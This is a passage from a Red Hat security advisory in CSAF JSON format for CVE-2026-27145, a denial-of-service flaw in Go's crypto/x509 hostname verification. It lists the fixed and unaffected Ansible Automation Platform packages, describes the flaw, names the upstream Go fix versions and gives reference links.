"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `crypto/x509` package of `golang`. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by presenting a specially crafted X.509 certificate with a large number of DNS Subject Alternative Name (SAN) entries. The certificate verification process, specifically the `VerifyHostname` function, incurs excessive computational overhead due to repeated string operations when processing these entries. This can lead to a significant performance degradation or unresponsiveness of systems validating such certificates.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: golang crypto/x509: Denial of Service via excessive processing of DNS SAN entries",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Go standard library crypto/x509 package. When verifying a TLS certificate hostname, VerifyHostname processed each DNS Subject Alternative Name (SAN) entry in a loop and repeatedly split the candidate hostname on \".\" characters. For certificates with a very large DNS SAN list, CPU use could grow quadratically with the number of SAN entries and hostname labels. Because hostname verification runs before the certificate chain is built, this overhead can occur even when the certificate is not trusted.\n\nRed Hat rates this issue as Important. It affects Red Hat products that include the Go standard library crypto/x509 code from an affected Go toolchain version (before Go 1.25.11, or from Go 1.26.0 through Go 1.26.3). Applications and container images built with a fixed Go release (1.25.11 or later, or 1.26.4 or later) are not affected. Community distributions such as Fedora are also affected.\n\nUpstream fix: Go 1.25.11 and Go 1.26.4 (GO-2026-5037).",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27145"
},
{
"category": "external",
"summary": "RHBZ#2484207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484207"
},
{
"category": "external",
